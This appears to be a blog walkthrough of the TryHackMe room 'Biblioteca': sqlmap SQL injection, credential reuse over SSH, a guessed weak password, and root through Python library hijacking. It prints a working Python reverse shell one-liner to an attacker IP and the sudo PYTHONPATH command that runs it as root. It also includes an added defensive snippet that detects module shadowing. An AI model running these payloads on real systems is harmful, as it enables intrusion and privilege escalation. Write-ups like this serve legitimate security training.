Biblioteca - TryHackMe


User Flag

First, we start by enumerating the open ports and services.

In the screenshot below I have already limited the scan to ports 22 and 8000, because a default nmap scan with no extra flags had shown that these were the open ones.

I access the website and see that it is a login page. I try creating a user through the Sign-Up link to see what is behind it, but there is nothing interesting there.

Since the first page is a login form, I quickly test it for SQL injection with sqlmap: I intercept the POST request and then feed the captured request to the sqlmap command.

We can observe that the username parameter is vulnerable, so I start retrieving information from the database. You can see in the image above that the database is called website.

As this is a TryHackMe host, the database is probably small, so to save time I use the --dump-all flag to dump everything from the website database.

Here I obtain a username and password and immediately try these credentials over SSH.

Looking for the flag, we see that it is in hazel's home directory and we don't have permission to read it, so we need to find a way to log in as hazel.

In this part I got stuck for a few minutes and needed to look at the hint. The hint was "Weak password", so I just tried a few simple password combinations, and "hazel", the same as the username, worked.

Now logged in as hazel, we just need to cat user.txt to get the first flag.


Root Flag

The first thing I do when I need to escalate privileges is check the sudo permissions and look for anything interesting about this user.

We see that hazel can run python3 as root on the file hasher.py.

Taking a look at this file, we see that it imports the hashlib library.

Here we can use a technique called Python Library Hijacking. Basically, we modify the library file, inserting a malicious payload, so that the payload is executed by root when the script imports the library.

This article explains the technique very clearly.

Since we don't have permission to edit the original library file, we copy it to the /tmp directory.

Now we can edit the copy and insert a Python reverse shell payload pointing at our tun0 address.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.117.185",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

We need to run the Python file with the PYTHONPATH environment variable set, which tells Python where to search for the libraries imported by hasher.py. When hasher.py runs it imports hashlib, and since our payload is in that copy of the library file, the reverse shell connects back to our listener.

Remember to set your listener before executing the command.

sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py
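The check below is an added example, not the room's files or the author's code. It shows the mechanism behind the PYTHONPATH trick from a defender's side: it resolves where a module would actually be imported from on a given search path, flags a resolution outside the standard library, and lists search-path entries that unprivileged users can write to. It uses only the standard library; the stand-in hashlib.py it creates in a temporary directory is constructed for the demonstration.

```python
import importlib.machinery
import os
import stat
import sys
import sysconfig
import tempfile

# Directories where standard-library modules such as hashlib legitimately live.
_PATHS = sysconfig.get_paths()
STDLIB_DIRS = {os.path.realpath(_PATHS["stdlib"]), os.path.realpath(_PATHS["platstdlib"])}


def module_origin(name, search_path):
    """File a module would be loaded from when searched on `search_path`
    (a list of directories, like sys.path), or None if it is not found there."""
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    if spec is None or not spec.origin:
        return None
    return os.path.realpath(spec.origin)


def is_shadowed(name, search_path):
    """True when `name` resolves from outside the stdlib directories, i.e. an
    earlier path entry (such as a PYTHONPATH=/tmp/ copy) shadows the real module."""
    origin = module_origin(name, search_path)
    return origin is not None and not any(origin.startswith(d + os.sep) for d in STDLIB_DIRS)


def risky_path_entries(search_path):
    """Entries of `search_path` that are group- or world-writable: places where an
    unprivileged user could drop a module that root would then import."""
    risky = []
    for entry in search_path:
        try:
            mode = os.stat(entry or os.curdir).st_mode
        except OSError:
            continue  # non-existent entries (e.g. a missing .zip) are skipped by Python too
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append(entry)
    return risky


def demo():
    """Constructed demonstration: a stand-in hashlib.py in a world-writable temp
    dir plays the role of the copied library; compare resolution with and without it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o1777)  # mimic /tmp permissions (constructed, our own directory)
        with open(os.path.join(tmp, "hashlib.py"), "w") as f:
            f.write("# constructed stand-in for the copied hashlib.py\n")
        hijacked = [tmp] + sys.path  # what PYTHONPATH=<tmp> effectively produces
        return {
            "clean_origin": module_origin("hashlib", sys.path),
            "clean_shadowed": is_shadowed("hashlib", sys.path),
            "hijacked_origin": module_origin("hashlib", hijacked),
            "hijacked_shadowed": is_shadowed("hashlib", hijacked),
            "risky_entries": risky_path_entries(hijacked),
        }
```

Running `demo()` on a normal system reports hashlib resolving from the stdlib for the clean path and from the temporary directory for the hijacked one, with that directory listed as a risky entry.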

Finally we obtain our reverse shell and just cat root.txt for the second flag.

See ya =)

b1d0ws

24 posts